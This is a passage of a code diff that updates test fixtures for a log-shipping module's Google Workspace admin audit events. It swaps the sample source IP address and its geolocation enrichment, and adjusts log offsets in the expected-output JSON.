-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1078,26 +1002,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9247,
+        "log.offset": 9228,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1119,7 +1039,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1136,26 +1056,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 9718,
+        "log.offset": 9698,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1177,7 +1093,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1192,26 +1108,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10237,
+        "log.offset": 10216,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1233,7 +1145,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1246,26 +1158,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10774,
+        "log.offset": 10752,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1286,7 +1194,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1299,26 +1207,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11184,
+        "log.offset": 11161,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log
index ff07d024c4c5..f720ee9d4085 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log
@@ -1,5 +1,5 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json
index ba25dbc3e682..b01010f11ab4 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -26,23 +26,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -67,7 +63,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -82,26 +78,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 594,
+        "log.offset": 593,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -127,7 +119,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -143,26 +135,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1191,
+        "log.offset": 1189,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -184,7 +172,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}",
